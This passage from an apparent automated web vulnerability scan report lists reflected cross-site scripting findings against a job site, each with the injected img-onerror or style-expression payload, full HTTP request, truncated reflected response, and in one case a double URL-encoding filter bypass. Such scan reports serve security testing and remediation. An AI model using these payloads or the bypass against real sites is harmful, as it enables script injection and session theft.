This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/js/dependent.jsdb2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:52:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:52:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-js-dependent.jsdb2bb"><img src=a onerror=alert(1)>d9d6098e8ef not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.92. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f was submitted in the REST URL parameter 1. This input was echoed as 72838"><img src=a onerror=alert(1)>b3d0a8fde2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f/all/modules/views_accordion/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:02:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:02:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites72838"><img src=a onerror=alert(1)>b3d0a8fde2f-all-modules-views-accordion-views-accordion.js not-front not-logged-in page-sites72838img-srca-onerroralert1b3d0a8fde2f no-sidebars">
...[SNIP]...

3.93. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36 was submitted in the REST URL parameter 2. This input was echoed as 1d572"><img src=a onerror=alert(1)>4fdbbcc7f36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36/modules/views_accordion/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:06:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:06:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all1d572"><img src=a onerror=alert(1)>4fdbbcc7f36-modules-views-accordion-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.94. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba was submitted in the REST URL parameter 3. This input was echoed as 3062d"><img src=a onerror=alert(1)>e573c228bba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba/views_accordion/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:09:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:09:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules3062d"><img src=a onerror=alert(1)>e573c228bba-views-accordion-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.95. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d15"style%3d"x%3aexpression(alert(1))"0106e014a15 was submitted in the REST URL parameter 3. This input was echoed as b7d15"style="x:expression(alert(1))"0106e014a15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /sites/all/modulesb7d15"style%3d"x%3aexpression(alert(1))"0106e014a15/views_accordion/views-accordion.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=c3ac5bd59bdef7174c64ca645b4969c1; expires=Sun, 15-May-2011 20:49:46 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:16:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesb7d15"style="x:expression(alert(1))"0106e014a15-views-accordion-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.96. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea7"><img%20src%3da%20onerror%3dalert(1)>51ac2dadf1d was submitted in the REST URL parameter 4. This input was echoed as 21ea7"><img src=a onerror=alert(1)>51ac2dadf1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views_accordion21ea7"><img%20src%3da%20onerror%3dalert(1)>51ac2dadf1d/views-accordion.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:18:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=26b01c34283a8c185613e700eb7d109e; expires=Sun, 15-May-2011 20:51:53 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:18:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-accordion21ea7"><img src=a onerror=alert(1)>51ac2dadf1d-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.97. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4 was submitted in the REST URL parameter 4. This input was echoed as d7030"><img src=a onerror=alert(1)>75e7ac5c8f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/modules/views_accordiond7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4/views-accordion.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:12:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:12:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-accordiond7030"><img src=a onerror=alert(1)>75e7ac5c8f4-views-accordion.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.98. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views_accordion/views-accordion.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db was submitted in the REST URL parameter 5. This input was echoed as 18db4"><img src=a onerror=alert(1)>60208cc18db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views_accordion/views-accordion.js18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/we-promise
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:15:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:15:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-accordion-views-accordion.js18db4"><img src=a onerror=alert(1)>60208cc18db not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.99. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114 was submitted in the REST URL parameter 1. This input was echoed as b0e6e"><img src=a onerror=alert(1)>a95dd8a114 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesb0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114/all/themes/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesb0e6e"><img src=a onerror=alert(1)>a95dd8a114-all-themes-threesixty-css-content.css not-front not-logged-in page-sitesb0e6eimg-srca-onerroralert1a95dd8a114 no-sidebars">
...[SNIP]...

3.100. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81 was submitted in the REST URL parameter 2. This input was echoed as c1af7"><img src=a onerror=alert(1)>fc22992ed81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allc1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81/themes/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allc1af7"><img src=a onerror=alert(1)>fc22992ed81-themes-threesixty-css-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.101. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433 was submitted in the REST URL parameter 3. This input was echoed as 1f0ed"><img src=a onerror=alert(1)>710145aa433 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes1f0ed"><img src=a onerror=alert(1)>710145aa433-threesixty-css-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.102. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae was submitted in the REST URL parameter 4. This input was echoed as 189af"><img src=a onerror=alert(1)>73e9826e1ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty189af"><img src=a onerror=alert(1)>73e9826e1ae-css-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.103. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b was submitted in the REST URL parameter 5. This input was echoed as 6646f"><img src=a onerror=alert(1)>d04b41f719b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
